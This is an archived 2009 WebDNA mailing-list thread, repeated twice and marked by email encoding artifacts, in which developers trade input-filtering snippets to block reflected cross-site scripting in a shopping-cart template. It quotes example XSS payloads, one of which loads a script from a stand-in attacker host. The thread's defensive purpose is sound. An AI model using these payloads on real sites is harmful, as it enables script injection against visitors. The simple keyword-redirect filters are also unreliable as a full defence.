I use = the index.html page sometimes, and the error.html page other times.
= If they are hacking I prefer to just send them to a real page than a = custom 404 page.=A0 It's probably a bot anyway, but if it's a real = person I don't want them to have the satisfaction of knowing they are = successful in any way.
According to HackerSafe (now McAfee) the = <script> and <iframe> attacks are the most common.=A0 So I filter = and redirect those quickly and any other attempted hacks are = nullified.
Now that I look at this again I see that the [cart] = could probably be grepped for characters, leaving only numbers.=A0 But = the simple test of >18 works, but not perfectly... in that I sometimes = see cart files in the ShoppingCarts directory that have character = names.
Matthew A Perosi = JewelerWebsites.com ------------------------------by Psi Prime------- Senior Web Developer 323 Union Blvd. Totowa, NJ 07512 Pre-Sales: 888.872.0274 Service: 973.413.8213 Training: 973.413.8214 Fax: 973.413.8217 http://www.jewelerwebsites.com= http://en.wikipedia= .org/wiki/Psi_Prime%2C_Inc http://www.psiprime.com
=
Jeffrey Jones wrote:=Hi Matthew,Any specific = reason you redirect to the index page?
=
-Jeff
On Apr 13, 2009, at 12:35 PM, = Psi Prime, Matthew A Perosi wrote:
This = seems to work for me.
It seems to stand up to the attacks from = McAfee Secure
[formvariables]
[showif = [url][name][/url]^script>][redirect /index.html][/showif]
[showif = [url][name][/url]^iframe][redirect /index.html][/showif]
= [text][url][name][/url]=3D[input][value][/input][/text]
= [/formvariables]
[showif = [countchars][cart][/countchars]>18][redirect = /index.html][/showif]
Matthew A Perosi JewelerWebsites.com ------------------------------by Psi Prime------- Senior Web Developer 323 Union Blvd. Totowa, NJ 07512 Pre-Sales: 888.872.0274 Service: 973.413.8213 Training: 973.413.8214 Fax: 973.413.8217 http://www.jewelerwebsites.com= http://en.wikipedia= .org/wiki/Psi_Prime%2C_Inc http://www.psiprime.com=
Marc Thompson wrote:You are correct Willian NEVER trust user input. What I always do is simply remove any characters I don't recognize using grep. All user input is "cleaned" before taking any action on it whatsoever. For [cart] values: [GetChars start=3D1&end=3D20][Grep search=3D[^0-9]&replace=3D][value][/Grep][/GetChars] For other text values: [GetChars start=3D1&end=3D100][Grep search=3D[^ ,-.%@_A-Za-z0-9=DC=FC=C4=E4=D6=F6]&replace=3D][value][/Grep][/GetChars= ] Marc William DeVaul wrote:I have no = idea about a server level fix. This goes to never trusting user input. I thought it should always be surrounded by [raw] and [url] to prevent this. What do others do? Bill On Mon, Apr 13, 2009 at 2:08 PM, Bob Minor <bob@cybermill.com> wrote:What = are people doing for the following type of attacks? http://www.exampl= e.com/shoppingcart.tpl?cart=3D"<script>alert123</script>" I assume you could just do a [removehtml][cart][/removehtml] I know you can do something like that at the code level but is there something that can be done at the server level or does the new version cicadae have built in protections? More info on the attackhttp://www.example.com/?var=3D= <SCRIPT%20a=3D">"%20SRC=3D"http://www.attacker.com/xss.js"></SCRIPT> This will exploit the reflected cross site scripting vulnerability shown before, executing the javascript code stored on the attacker's web = server as if it was originating from the victim web site, www.example.com. A complete test will include instantiating a variable with several = attack vectors (Check Fuzz vectors appendix and Encoded injection appendix). Finally, analyzing answers can get complex. A simple way to do this is = to use code that pops up a dialog, as in our example. This typically = indicates that an attacker could execute arbitrary JavaScript of his choice in the visitors' browsers.--------------------------------------------------------- This message is sent to you because you are subscribed to the mailing list <talk@webdna.us>. To unsubscribe, E-mail to: <talk-leave@webdna.us> archives: http://mail.webdna.us/l= ist/talk@webdna.us old archives: http://dev.webdna.us/TalkLi= stArchive/ .=
|
I use = the index.html page sometimes, and the error.html page other times.
= If they are hacking I prefer to just send them to a real page than a = custom 404 page.=A0 It's probably a bot anyway, but if it's a real = person I don't want them to have the satisfaction of knowing they are = successful in any way.
According to HackerSafe (now McAfee) the = <script> and <iframe> attacks are the most common.=A0 So I filter = and redirect those quickly and any other attempted hacks are = nullified.
Now that I look at this again I see that the [cart] = could probably be grepped for characters, leaving only numbers.=A0 But = the simple test of >18 works, but not perfectly... in that I sometimes = see cart files in the ShoppingCarts directory that have character = names.
Matthew A Perosi = JewelerWebsites.com ------------------------------by Psi Prime------- Senior Web Developer 323 Union Blvd. Totowa, NJ 07512 Pre-Sales: 888.872.0274 Service: 973.413.8213 Training: 973.413.8214 Fax: 973.413.8217 http://www.jewelerwebsites.com= http://en.wikipedia= .org/wiki/Psi_Prime%2C_Inc http://www.psiprime.com
=
Jeffrey Jones wrote:=Hi Matthew,Any specific = reason you redirect to the index page?
=
-Jeff
On Apr 13, 2009, at 12:35 PM, = Psi Prime, Matthew A Perosi wrote:
This = seems to work for me.
It seems to stand up to the attacks from = McAfee Secure
[formvariables]
[showif = [url][name][/url]^script>][redirect /index.html][/showif]
[showif = [url][name][/url]^iframe][redirect /index.html][/showif]
= [text][url][name][/url]=3D[input][value][/input][/text]
= [/formvariables]
[showif = [countchars][cart][/countchars]>18][redirect = /index.html][/showif]
Matthew A Perosi JewelerWebsites.com ------------------------------by Psi Prime------- Senior Web Developer 323 Union Blvd. Totowa, NJ 07512 Pre-Sales: 888.872.0274 Service: 973.413.8213 Training: 973.413.8214 Fax: 973.413.8217 http://www.jewelerwebsites.com= http://en.wikipedia= .org/wiki/Psi_Prime%2C_Inc http://www.psiprime.com=
Marc Thompson wrote:You are correct Willian NEVER trust user input. What I always do is simply remove any characters I don't recognize using grep. All user input is "cleaned" before taking any action on it whatsoever. For [cart] values: [GetChars start=3D1&end=3D20][Grep search=3D[^0-9]&replace=3D][value][/Grep][/GetChars] For other text values: [GetChars start=3D1&end=3D100][Grep search=3D[^ ,-.%@_A-Za-z0-9=DC=FC=C4=E4=D6=F6]&replace=3D][value][/Grep][/GetChars= ] Marc William DeVaul wrote:I have no = idea about a server level fix. This goes to never trusting user input. I thought it should always be surrounded by [raw] and [url] to prevent this. What do others do? Bill On Mon, Apr 13, 2009 at 2:08 PM, Bob Minor <bob@cybermill.com> wrote:What = are people doing for the following type of attacks? http://www.exampl= e.com/shoppingcart.tpl?cart=3D"<script>alert123</script>" I assume you could just do a [removehtml][cart][/removehtml] I know you can do something like that at the code level but is there something that can be done at the server level or does the new version cicadae have built in protections? More info on the attackhttp://www.example.com/?var=3D= <SCRIPT%20a=3D">"%20SRC=3D"http://www.attacker.com/xss.js"></SCRIPT> This will exploit the reflected cross site scripting vulnerability shown before, executing the javascript code stored on the attacker's web = server as if it was originating from the victim web site, www.example.com. A complete test will include instantiating a variable with several = attack vectors (Check Fuzz vectors appendix and Encoded injection appendix). Finally, analyzing answers can get complex. A simple way to do this is = to use code that pops up a dialog, as in our example. This typically = indicates that an attacker could execute arbitrary JavaScript of his choice in the visitors' browsers.--------------------------------------------------------- This message is sent to you because you are subscribed to the mailing list <talk@webdna.us>. To unsubscribe, E-mail to: <talk-leave@webdna.us> archives: http://mail.webdna.us/l= ist/talk@webdna.us old archives: http://dev.webdna.us/TalkLi= stArchive/ .=
DOWNLOAD WEBDNA NOW!
The WebDNA community talk-list is the best place to get some help: several hundred extremely proficient programmers with an excellent knowledge of WebDNA and an excellent spirit will deliver all the tips and tricks you can imagine...